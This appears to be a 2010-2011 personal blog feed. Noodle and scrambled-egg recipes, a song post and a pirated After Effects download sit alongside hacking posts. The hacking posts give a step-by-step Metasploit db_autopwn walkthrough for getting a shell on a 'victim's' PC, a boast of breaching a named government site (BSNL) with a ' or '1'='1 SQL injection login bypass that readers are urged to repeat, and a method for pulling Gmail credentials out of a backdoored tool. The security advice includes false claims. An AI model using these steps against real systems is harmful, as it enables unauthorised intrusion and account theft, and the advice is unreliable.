=>> Bangggg! You are done! Now a new windows should be opened, it's like you are in the PC, you can control the whole PC :)

In this paper I'll explain:

1. How does the exploits work.
2. How to prevent your computer from being exploited.
3. How to use autopown function in Metasploit to hack a remote machine.

How does the exploits work?

Exploits are made by finding a security hole in a software. And then we can send our payload to perform different actions.
Exploit writers needs to have very deep knowledge of the software/program in which they are trying to find a security hole to prepare/write an exploit. Usually all exploits are to be executed on a third party software, as the security holes are found in those softwares. But there are also some exploits available to directly attack OS, means the security holes are found in a windows file.

How to prevent your computer from being exploited.

Almost 60% of operating systems are patched till date. And there's no exploit for Win 7 currently. Some anti-viruses can also block some hackers from exploiting your computer.
Though there are some things you can do to prevent your computer from being exploited:

1. Never run any unwanted link.
2. Never turn your AV off even when someone tells you to do so.
3. Don't share your IP with anyone.
4. If you know that the hacker has your IP address and if you have a dynamic IP, simply re-connect your internet connection.

These are some steps you can follow to prevent your computer from being exploited.

_________________________________

Now, I'll explain you how to hack a remote computer just by its IP address. By launching exploit on a third party software in victim's computer.

It works 50% times.

Download latest Metasploit framework from its official site - www.metasploit.com
Okay now when you downloaded it, now install, and between installation it'll ask you if you want to install Nmap also, say YES.

Nmap is a software which allows you to check the open ports, OS, sevices, etc of a remote computer just with its IP.

Now launch msfconsole.

It'll take sometime as it has more than 600 exploits and 200 payloads.

Type = db_driver sqlite3

=>> It'll enable the database driver.

Now type = db_create

=>> It'll create a database.

Type = nmap

=>> It'll load the Nmap up.

Now type = db_nmap -sT -sV [victim's ip address]

=>> It'll show the open ports of victim's machine.

Now finally type = db_autopwn -p -t -e

=>> Now it'll try different-different exploits on the remote machine automatically, and if it found the exploit working, it'll give you a CMD shell for the remote PC!

Voila! Now you can do anything with his PC!

x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Now the white papers are over for Metasploit, now only tutorials will come >:D<

Again - I'm not responsible for anything you do with this info!

If you have any questions, I'll try to best to help you!

Tango Soupy Noodles by Ashish

noreply@blogger.com (ArtistAshish) — Tue, 04 Jan 2011 08:49:00 +0000

Ultimate Damn Easy Noodles Ideal for a small Quick Snack.

INGREDIENTS:

Maggi Noodles ( 1 pack )
Maggi Tomato Soup Powder ( 1 Pack )
Water (300ml)
Oil (1 tablespoon)
Black Pepper

PROCEDURE:

Take a Pan. Add Oil and Water in it.
Then Add MAGGI Soup Powder in it. Mix it well and avoid formation of Lumps.
Add Maggi Noodles and Bring it to Boil.
Slow Down the Flame and Add Maggi Tastemaker.
Cover it for 5-6 minutes.
Turn off the Flame and keep it Covered for 5 minutes
Enjoy with Coriander Leaves.

TIPS: Add Veggies like Spring Onion, Capsicum to make it taste Awesome...

VIDEOHIVE After Effects Project File - Corporate Portrait Gallery - 66393 - DOWNLOAD

noreply@blogger.com (ArtistAshish) — Fri, 31 Dec 2010 10:13:00 +0000

Preview Here...

http://videohive.net/item/-corporate-portrait-gallery/66393

To Download:

DEPOSITFILES LINK

RAPIDSHARE LINK

FILEFACTORY LINK

ENJOY..!

Tango Spanish Style Scrambled Eggs by Ashish

noreply@blogger.com (ArtistAshish) — Sun, 26 Dec 2010 17:15:00 +0000

So one of the Oldest Dishes made by me and Too Simple.. even a child can make it at Home. This is a Fusion of Indian and Spanish Taste and Cooking. And when I made this Dish first time.. I was quite Proud of myself. Come On.. I was just 13 Years old.. :P. In This Recipe...Tomatoes are doing the Magic.

Sorry Low Quality Mobile Camera :P

INGREDIENTS-

Eggs: 2
Tomatoes ( Medium Sized ): 2-3 Chopped
Onion ( Medium Sized ): 1 Chopped
Capsicum ( Medium Sized ): 1 Chopped
Green Chillies: 2 Cut into Half along length
Ginger: 20gms Chopped
Spring Onion: 1-2 Copped
Red Chili Powder: to Taste ( in my case I love Spicy :P)
Salt: to Taste
Cinnamon: 1 Teaspoon
Pepper: 1 Teaspoon
Olive Oil: 1 Tablespoon
Mustard Seeds: 9-10
Coriander Leaves

PROCEDURE:

Take a Pan and put Oil in it. wait for it to get Heated up.
Add Mustard Seeds and see the Magic. ( if you are new in Kitchen :P )
Add Onions, Ginger and Green Chili and Cinnamon
Wait for Onions to get Golden Brown and then add Tomato, Capsicum, Spring Onion.
Add Salt, Red Chili Powder, Pepper.
Wait for Things to get along well and then Add two Eggs directly in it.
Beat the Eggs inside with Everything well.
When Egg gets Cooked Well turn Off the Gas Stove and Place the ready Eggs in a Plate
Garnish with Coriander Leaves.

Taste Best with Tomato Sauce and also as filling in Sandwiches.

Enjoy Cooking..!

BSNL website HACKED by Ashish :)

noreply@blogger.com (ArtistAshish) — Wed, 08 Dec 2010 09:55:00 +0000

BSNL Hacked by Simple SQLi .. Never thought this much BIG Govt. site will be vulnerabe to suach a Chindi thing :P

See Yourself..

go here
LINK 1

or

LINK 2

simply Enter

' or '1'='1

In password field

and

ENJOY..!

NOTE: It is for educational Purpose Only

TERI BEWAFAYI- Awesome Song by Deep SEnses

noreply@blogger.com (ArtistAshish) — Sat, 04 Dec 2010 12:21:00 +0000

Amazing Punjabi Rap song
Touched me in my Heart When I first Heard it
I listen to it almost 10 times Everyday

I bet If you have Loved Someone in your life... You will go mad for this song...

Please Leave Nice Comments if you like the Song

Guaranteed Method to Hack a gmail account

noreply@blogger.com (ArtistAshish) — Sat, 06 Nov 2010 10:00:00 +0000

first get a hacking tool no need to worry where to find just go to http://www.youtube.com and search "Runescape Hacker" or "Runescape Hacker Download Link"

you will get the downloading link in comments zone

now you have downloaded the hacker tool but -Don't open the Runescape Hacker Tool, It may be Backd00red Instead place it in a Safe area!

download and install hexworkshop now dont ask for link...google is your friend

now right click on tool ,,you will see "Edit this with HexWorkshop"...click it

you will see a mess of words and alphabets symbols....dont worry dont get confused believe me its easy to do!

now press ctrl+f... a boz will appear

-Now Before start Finding Anything Make sure you change the "Hex" to "String" value.

-Now Enter "Gmail" to the Box and Hit "Find".

-You will Get Popping Up a Black area. Don't touch it. Instead see on your Right for the Texts.

-Copy the Highlighted text and Paste it in a Text document (Newly Created).

-Remove the [.]>DOTs and You will see The Email ID + the Passwd.

Njoy Hacking!!